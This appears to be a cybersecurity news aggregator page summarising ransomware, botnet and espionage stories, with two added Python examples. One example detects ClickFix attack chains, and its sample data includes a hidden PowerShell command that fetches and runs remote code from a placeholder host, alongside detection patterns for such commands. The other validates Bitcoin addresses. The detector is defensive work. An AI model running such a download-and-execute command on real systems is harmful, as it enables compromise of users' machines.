techminis

A naukri.com initiative

Malware News

Cybersecurity-Insiders

11h

What should we learn from International Anti Ransomware Day

  • International Anti-Ransomware Day is observed every year on May 12th to raise awareness of ransomware and promote preventive measures.
  • Its core lessons: prevent infections through timely patching and sound security controls, keep secure and regularly tested backups, raise cybersecurity awareness among all users, and discourage paying ransoms.
  • The date marks the anniversary of the WannaCry outbreak (12 May 2017) and underscores the need for collaboration among governments, agencies and organizations to combat cybercrime effectively.
  • Security education and policies that build cyber resilience are crucial to mitigating ransomware; cybersecurity is a shared responsibility of individuals and organizations.

Kaspersky

14h

The ransomware landscape in 2025 | Kaspersky official blog

  • Decryptors supplied after payment are often poor: attackers may never send one, or send a slow and buggy tool. Criminal groups specialize in encryption, not in building reliable decryption software.
  • Attackers repeatedly hit the same victims, switching between groups and affiliates to keep extorting them.
  • Legislation is tightening worldwide, with more jurisdictions requiring companies to report incidents promptly.
  • Paying carries legal risk and long-term repercussions for the company, and it does not guarantee confidentiality: stolen data may still be leaked or disclosed.
  • Law-enforcement actions and evolving laws have changed the ransomware landscape, and the total amount paid in ransoms has declined.
  • Some ransomware groups now pursue espionage or mixed motives, making it harder for victims to understand who they are dealing with and why.
  • Paying operators feeds the problem; a detailed, rehearsed incident-response plan and monitoring solutions are what actually enable recovery and an effective defence.

TechCrunch

3d

FBI and Dutch police seize and shut down botnet of hacked routers

  • The FBI and Dutch police have seized and shut down proxy services built on a botnet of hacked internet-connected devices, mainly routers.
  • U.S. prosecutors indicted four people, three Russian nationals and one Kazakhstani national, for hacking into routers and running the botnet under the guise of legitimate proxy services.
  • The accused compromised vulnerable internet-connected devices to build the botnet and sold access through the Anyproxy and 5Socks services, earning more than $46 million.
  • Lumen's Black Lotus Labs helped track the proxy networks, which offered anonymity to cybercriminals and averaged about 1,000 weekly active proxies across more than 80 countries.

Securityaffairs

3d

Cybercriminal services target end-of-life routers, FBI warns

  • The FBI warns that cybercriminal services are targeting end-of-life routers, infecting them with malware and reselling them as proxies through the 5Socks and Anyproxy networks.
  • End-of-life routers no longer receive security updates, so known vulnerabilities remain exploitable and make them easy targets for threat actors.
  • Infected routers are either pooled into botnets for coordinated attacks or sold as proxies, giving threat actors persistent access to and control over the compromised devices.
  • The FBI's alert publishes indicators of compromise (IoCs) and mitigations: replace end-of-life routers with supported models, or at minimum disable remote administration and reboot the device. A reboot only clears the current infection; because the underlying vulnerability remains, an unreplaced device can be reinfected.

Cybersecurity-Insiders

4d

Ransomware news headlines trending on Google

  • The LockBit ransomware group itself suffered a data breach that exposed sensitive data from its own infrastructure.
  • Oettinger Breweries, a German beer producer, was hit by the RansomHouse ransomware group, resulting in the compromise of critical company data.
  • The Play ransomware group is exploiting Windows vulnerabilities to attack businesses across sectors, encrypting data and gathering intelligence from compromised networks.
  • Together these incidents show cybercriminals targeting one another as well as forming alliances, and underline the need for robust security measures and collaboration between public and private entities.

Securityaffairs

13h

Threat actors use fake AI tools to deliver the information stealer Noodlophile

  • Morphisec researchers warn that threat actors are using fake AI tools to distribute Noodlophile, a previously undocumented information stealer.
  • The campaign rides the AI hype: viral posts and Facebook groups lure users into downloading Noodlophile Stealer, which steals browser credentials and cryptocurrency wallets.
  • Noodlophile is sold on cybercrime forums as malware-as-a-service and is often bundled with other credential-theft tooling.
  • Lures posing as free AI video and image editors, such as 'Dream Machine' or 'CapCut', spread through social media and deliver Noodlophile or the XWorm remote access trojan instead.

Cybersecurity-Insiders

21h

DragonForce Ransomware targeting M&S vows not to target Russia or the former Soviet Union

  • DragonForce, the ransomware operation behind the attack on Marks & Spencer, urges other cybercriminals not to target businesses in Russia and the former Soviet Union.
  • The stance has prompted speculation that DragonForce has ties to Russia or is funded from the post-Soviet region, and is showing loyalty to those territories in return.
  • DragonForce says its policy is purely financial extortion and that it does not destroy valuable business data; it frames the regional carve-out as protecting the use of technology there.
  • The group has targeted 90 companies across sectors and has warned other crews, including Scattered Spider, not to attack networks in Russia, drawing new boundaries for cybercrime operations.

Securityaffairs

1d

Security Affairs newsletter Round 523 by Pierluigi Paganini – INTERNATIONAL EDITION

  • Personal data of 437,329 patients exposed in the Ascension cyberattack.
  • Operation Moonlander dismantles the cybercriminal proxy services Anyproxy and 5socks.
  • SonicWall fixes critical flaws in SMA 100 appliances.
  • NSO Group ordered to pay over $167M to WhatsApp over its spyware campaign.

Securityaffairs

2d

Operation Moonlander dismantled the botnet behind the Anyproxy and 5socks cybercriminal services

  • Operation Moonlander dismantled a botnet that had been running for roughly two decades behind the Anyproxy and 5socks cybercriminal services, and four suspects were charged.
  • The U.S. Justice Department charged Russian and Kazakhstani nationals with maintaining, operating and profiting from Anyproxy and 5socks.
  • The operators accepted cryptocurrency payments and infected IoT and SOHO devices, which customers then used for ad fraud, DDoS attacks and brute-force attacks.
  • The FBI released a FLASH alert on 5Socks and Anyproxy targeting end-of-life routers, urging owners to replace compromised devices or, failing that, to disable remote administration and reboot.

Cybersecurity-Insiders

3d

No cyber threat to India ATMs from Pakistan Ransomware Attack

  • Tensions between India and Pakistan rose after a terrorist attack, fuelling rumours that Pakistani hackers would launch a ransomware attack on Indian ATMs.
  • Misinformation on social media claimed Indian ATMs would be shut down preventively, prompting people to rush to withdraw cash for fear of a banking crisis.
  • The Indian government officially denied the rumours, confirming there are no plans to shut down ATMs and stating that the country is prepared to handle cyber threats.
  • Authorities advised citizens to use social media responsibly, fact-check claims, and watch for malware such as the 'Dance of the Hillary' file circulating on mobile devices.

Securityaffairs

3d

Russia-linked ColdRiver used LostKeys malware in recent attacks

  • The Russia-linked APT COLDRIVER has used LostKeys malware in espionage attacks on Western governments and organizations since early 2025.
  • COLDRIVER primarily targets NATO countries, the Baltics, the Nordics and Eastern Europe including Ukraine, focusing on government officials, military personnel, journalists and think tanks.
  • LostKeys is delivered through a multi-step ClickFix chain: a fake CAPTCHA page gets the victim to copy a PowerShell command and run it through the Windows Run dialog, which fetches further stages and ends in a VBS payload that steals files, sends system information to the attacker and runs processes.
  • Google's Threat Intelligence Group found LostKeys in a small number of highly selective ClickFix attacks. It also found two additional samples dating back to December 2023, and it is unclear whether those are related to COLDRIVER.
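
The ClickFix chain described above lends itself to a process-tree detection. The block below is an added example written for this page, not code from Google's report or from Securityaffairs: it scores Sysmon-style process-creation records for a PowerShell child of explorer.exe whose command line carries hidden-window, download-and-execute or URL traits, and then marks any wscript.exe/cscript.exe child of a flagged shell as the VBS stage. The sample events, pids, file paths and the example.invalid URL are constructed; the field names mirror Sysmon Event ID 1 but the records are not real telemetry, and the scoring rules are the editor's own heuristics.

```python
"""Flag ClickFix-style process chains (fake CAPTCHA -> pasted PowerShell -> VBS payload)
in process-creation telemetry. Added example; the rules are the editor's own heuristics."""
import re

# Constructed records modelled on Sysmon Event ID 1 fields. Not real telemetry:
# pids, paths and the URL (example.invalid) are made up for the demonstration.
# The second pass in detect() assumes events are listed in creation order.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 1888,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"ProcessId": 4500, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"wscript.exe C:\Users\alice\AppData\Local\Temp\stage.vbs"},
    {"ProcessId": 5012, "ParentProcessId": 1888,      # user opened a console: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
    {"ProcessId": 5300, "ParentProcessId": 900,       # management agent running a script: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Agent\agent.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
USER_LAUNCHERS = {"explorer.exe"}            # Run dialog and desktop launches come from explorer.exe
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Command-line traits typical of a pasted ClickFix one-liner. Each match adds one reason.
COMMAND_LINE_TRAITS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), "remote fetch"),
    (re.compile(r"https?://", re.I), "url on command line"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the reasons an event looks like the first (PowerShell) stage of a ClickFix chain."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    reasons = []
    if image in SHELLS and parent in USER_LAUNCHERS:
        reasons.append("shell spawned by explorer.exe (Run dialog or pasted command)")
    if image in SHELLS:
        reasons += [label for rx, label in COMMAND_LINE_TRAITS if rx.search(cmd)]
    return reasons


def detect(events: list, threshold: int = 2) -> dict:
    """Map ProcessId -> reasons for every event with at least `threshold` reasons, plus any
    script-host child of a flagged shell (the VBS stage), which inherits the parent's alert."""
    flagged = {}
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            flagged[ev["ProcessId"]] = reasons
    for ev in events:
        if basename(ev["Image"]) in SCRIPT_HOSTS and ev["ParentProcessId"] in flagged:
            flagged[ev["ProcessId"]] = [
                f"script host spawned by flagged shell pid {ev['ParentProcessId']}",
                f"payload: {ev['CommandLine'].split()[-1]}",
            ]
    return flagged


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The threshold keeps an interactive console opened from explorer.exe (one reason) out of the alert set, while the pasted one-liner collects several reasons at once. Correlating the wscript.exe child to its flagged parent is what surfaces the VBS stage, which on its own looks like any other script execution.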

Cybersecurity-Insiders

3d

Ransomware Resurgence: 5 Lessons from Healthcare’s Cyber Frontlines

  • Healthcare organizations faced a surge in ransomware attacks in 2024, with recovery costs averaging over $2.5 million per incident.
  • Ransomware-as-a-service has lowered the barrier to entry, and healthcare is singled out because its operations cannot tolerate downtime.
  • Patient records are highly valuable and routinely sold on the dark web, which adds to the sector's attractiveness to cybercriminals.
  • Legacy systems and connected medical devices present security gaps that ransomware operators exploit.
  • Beyond the financial cost, attacks directly harm patient care and safety: treatments are delayed and emergency services are diverted.
  • Many healthcare organizations still allocate less than 10% of their IT budget to cybersecurity and need to invest more.
  • Recommended measures for resilience: regular risk assessments, modern security tooling, staff training, secure backups, and tight access controls.
  • Because ransomware threatens patient safety and public health, and because the groups involved are increasingly sophisticated and focused on the sector, proactive investment in network defence and operational continuity is now a patient-outcome issue, not just an IT one.

Qualys

4d

Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations

  • The LockBit ransomware gang's dark web affiliate panels were defaced and a dump of the backing MySQL database was leaked.
  • The dump includes victim negotiation messages and Bitcoin addresses from the affiliate panel.
  • LockBit has evolved since 2019 through LockBit 2.0 and LockBit 3.0, each release expanding its capabilities.
  • It runs on an affiliate model: core developers build and maintain the ransomware, affiliates carry out the intrusions.
  • Attacks follow the familiar sequence of initial access, lateral movement, data exfiltration, encryption and ransom-note delivery.
  • The leaked chats show LockBit demanding payment in Bitcoin while offering discounts for payment in Monero.
  • The article lists the critical CVEs LockBit affiliates have exploited, which organizations should prioritize for patching or mitigation.
  • Targets go beyond traditional endpoints: Veeam backup servers, vCenter, ESXi hosts, NAS devices and file-transfer tools are all in scope.
  • Recommendations: patch known exploited vulnerabilities, harden backup infrastructure, and enforce strong credentials.
  • Understanding LockBit's tactics and improving basic security hygiene are the most effective ways to strengthen defences against ransomware.

Securityaffairs

4d

The LockBit ransomware site was breached, database dump was leaked online

  • The LockBit ransomware group's dark web site was compromised, exposing data from its backend infrastructure.
  • The intruders defaced the site and posted a message with a link to a dump of the MySQL database, which contains victim chat logs and user data among other tables.
  • BleepingComputer's analysis found 20 tables, including Bitcoin addresses, victim chat logs, and user accounts whose passwords were stored in plaintext.
  • Italian researcher Emanuele De Lucia extracted over 60k Bitcoin addresses from the dump and suggested it may also contain material useful for building decryption tools. The chat logs show ransom demands ranging from $50,000 to $1,500,000.
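
De Lucia's extraction of 60k addresses from the dump, like the Bitcoin addresses in the affiliate panel that the Qualys piece above also notes, raises a practical triage question: how to pull addresses out of a raw SQL dump without counting typos and look-alike strings. The block below is an added example written for this page, not code from either article or from the researchers: it scans text for address-shaped tokens and keeps only those whose Base58Check or bech32 checksum verifies. SAMPLE_DUMP is a constructed stand-in, not the leaked data; the two valid addresses in it are the public Bitcoin genesis-block address and the BIP173 example P2WPKH address, and the table and column names are invented.

```python
"""Pull Bitcoin addresses out of a leaked SQL dump and keep only those whose checksum
verifies, so typos and look-alike strings do not inflate the count. Added example."""
import hashlib
import re

# Constructed stand-in for a few lines of a MySQL dump; it is not the leaked LockBit data.
# Row 1 holds the public Bitcoin genesis-block address, row 2 the BIP173 example P2WPKH
# address; the chat row repeats the genesis address with its last character altered.
SAMPLE_DUMP = """
INSERT INTO `btc_addresses` VALUES (1,'1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa','2025-05-01 10:12:07');
INSERT INTO `btc_addresses` VALUES (2,'bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4','2025-05-02 08:40:19');
INSERT INTO `chats` VALUES (7,44,'send 1.5 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb within 72h');
INSERT INTO `users` VALUES (9,'affiliate_17','a9993e364706816aba3e25717850c26c9cd0d89d');
"""

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"

# Shape filter only: legacy/P2SH (1... or 3...) or native segwit (bc1...). Checksums decide.
CANDIDATE_RE = re.compile(
    r"\b(?:[13][" + B58_ALPHABET + r"]{25,34}|bc1[" + BECH32_CHARSET + r"]{25,87})\b"
)


def base58check_valid(addr: str) -> bool:
    """Decode Base58, restore leading zero bytes, and verify the 4-byte double-SHA256 checksum."""
    n = 0
    for ch in addr:
        n = n * 58 + B58_ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + body   # each leading '1' is a 0x00 byte
    if len(raw) != 25:                                            # version + 20-byte hash + checksum
        return False
    checksum = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4]
    return checksum == raw[21:]


def _bech32_polymod(values) -> int:
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk


def bech32_valid(addr: str) -> bool:
    """Verify a mainnet bech32 (segwit v0) or bech32m (v1+) checksum per BIP173/BIP350."""
    hrp, _, data = addr.rpartition("1")
    if hrp != "bc" or not 6 <= len(data) <= 87:
        return False
    expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    values = expanded + [BECH32_CHARSET.index(c) for c in data]
    return _bech32_polymod(values) in (1, 0x2BC830A3)


def extract_addresses(dump_text: str) -> dict:
    """Map every address-shaped token in the dump to whether its checksum verifies."""
    found = {}
    for m in CANDIDATE_RE.finditer(dump_text):
        addr = m.group(0)
        found[addr] = bech32_valid(addr) if addr.startswith("bc1") else base58check_valid(addr)
    return found


def valid_addresses(dump_text: str) -> list:
    return sorted(a for a, ok in extract_addresses(dump_text).items() if ok)


if __name__ == "__main__":
    for addr, ok in extract_addresses(SAMPLE_DUMP).items():
        print(("valid   " if ok else "invalid ") + addr)
```

Checksum verification is what makes the count trustworthy: a 34-character token that passes the regex but fails Base58Check (the altered address in the chat row) is noise, not a payment address. Addresses on other chains, such as the Monero the chats also mention, need their own decoders.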

Securityaffairs

5d

Play ransomware affiliate leveraged zero-day to deploy malware

  • The Play ransomware gang exploited a flaw in the Windows Common Log File System (CLFS) driver as a zero-day to deploy malware and gain SYSTEM privileges on compromised hosts.
  • The vulnerability, CVE-2025-29824, is a local privilege-escalation bug; its exploitation in the wild by a Play affiliate has been confirmed.
  • Microsoft fixed it in the April 2025 Patch Tuesday updates, and CISA added it to its Known Exploited Vulnerabilities catalog.
  • Before the patch the exploit was in the hands of more than one actor: Microsoft tied it to the PipeMagic backdoor and the group it tracks as Storm-2460, while the Play attack is attributed to the cluster Symantec calls Balloonfly.
